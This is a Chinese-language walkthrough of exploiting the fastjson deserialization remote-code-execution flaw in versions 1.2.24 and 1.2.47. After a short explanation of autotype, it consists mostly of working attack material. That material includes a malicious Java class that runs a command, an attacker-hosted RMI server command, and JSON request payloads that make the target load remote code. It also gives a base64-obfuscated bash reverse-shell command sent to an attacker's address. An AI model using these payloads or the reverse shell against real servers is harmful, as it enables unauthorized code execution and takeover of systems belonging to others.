漏洞原理fastjson提供了autotype功能，在请求过程中，我们可以在请求包中通过修改@type的值，来反序列化为指定的类型，而fastjson在反序列化过程中会设置和获取类中的属性，如果类中存在恶意方法，就会导致代码执行漏洞产生。

漏洞利用漏洞利用需要我们在vps上启一个RMI服务并调用class文件(class文件为我们的恶意文件)

大概过程就是

生成恶意class文件

py开启web服务

然后开启rmi服务让受害者去调用我们恶意的class文件反序列化后达到命令执行的效果

fastjson 1.2.24

创建恶意的class文件 TouchFile.java 内容如下// javac TouchFile.java

import java.lang.Runtime;

import java.lang.Process;

public class TouchFile {

static {

try {

Runtime rt = Runtime.getRuntime();

String[] commands = {"touch", "/tmp/success"};

Process pc = rt.exec(commands);

pc.waitFor();

} catch (Exception e) {

// do nothing

}

}

}

javac TouchFile.java 将他编译成class文件

命令执行成功的话将在tmp文件下生成success文件

py启动一个web服务器

然后我们借助marshalsec项目，启动一个RMI服务器，监听9999端口，并制定加载远程类TouchFile.classjava -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://yourip:8000/#/TouchFile" 9999

然后发送请求包加载我们的恶意class文件达到rce的效果POST / HTTP/1.1

Host: targetip:8090

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Type: application/json

Content-Length: 162

{

"b":{

"@type":"com.sun.rowset.JdbcRowSetImpl",

"dataSourceName":"rmi://yourip:9999/TouchFile",

"autoCommit":true

}

}

或者使用fastjson_tool.jar更加方便

反弹shell

运行RMI服务，加载恶意java类java -cp fastjson_tool.jar fastjson.HRMIServer rmi服务ip 9999 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMS84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}"

发送反序列化代码漏洞执行命令python3 fastjson-1.2.47_rce.py http://targetip:8090 rmi://rmi ip:9999/Object

可以看到成功加载到我们恶意的class文件成功反弹shell

fastjson 1.2.47{

"a":{

"@type":"java.lang.Class",

"val":"com.sun.rowset.JdbcRowSetImpl"

},

"b":{

"@type":"com.sun.rowset.JdbcRowSetImpl",

"dataSourceName":"rmi://rmi ip:9999/Exploit",

"autoCommit":true

}

}

也可以使用dnslog快速探测是否存在该漏洞